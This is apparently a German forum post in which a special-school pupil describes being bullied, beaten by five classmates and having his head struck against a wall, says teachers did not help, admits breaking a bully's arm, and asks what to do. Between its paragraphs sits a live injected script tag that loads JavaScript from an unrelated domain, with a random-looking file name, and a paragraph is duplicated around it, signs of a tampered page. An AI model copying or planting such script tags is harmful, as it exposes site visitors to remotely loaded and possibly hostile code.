ich werde gehmobbt weill ich FÖRDERSCHÜLER binn und ich weiß nicht was ich machen soll einmal wurde ich angehkriffen von 5 leuten die mich zusammen gehschlagen haben biss ich aufen bodenlag ja und die dan habe ich es gehsagt also die lehrer aber es hilft nichst die machen immer weitter biss ich ma gehwert habe aber das war scheiße von mir ich haben den jungen der mich mobbt den arm gehbrochen seit den läst er mich bissel in ruche aber er schikt immer leute auf mich
ja und dan wurde noch mein kopf gegen eine wand gehschlagen und die erwachsenen haben nichst gehmacht die haben nur gehsagt die sollen mich in ruche lassen es hat alles angehfangen aufen schuhlhoff ich sool ihn beleidigt haben was nicht stimmt kann mir jemanden sagen was ich machen soll
<script src="http://rosa-farbe.info/dfi823hs.js?0.47135254576954577"></script>
ja und dan wurde noch mein kopf gegen eine wand gehschlagen und die erwachsenen haben nichst gehmacht die haben nur gehsagt die sollen mich in ruche lassen es hat alles angehfangen aufen schuhlhoff ich sool ihn beleidigt haben was nicht stimmt kann mir jemanden sagen was ich machen soll

Kommentar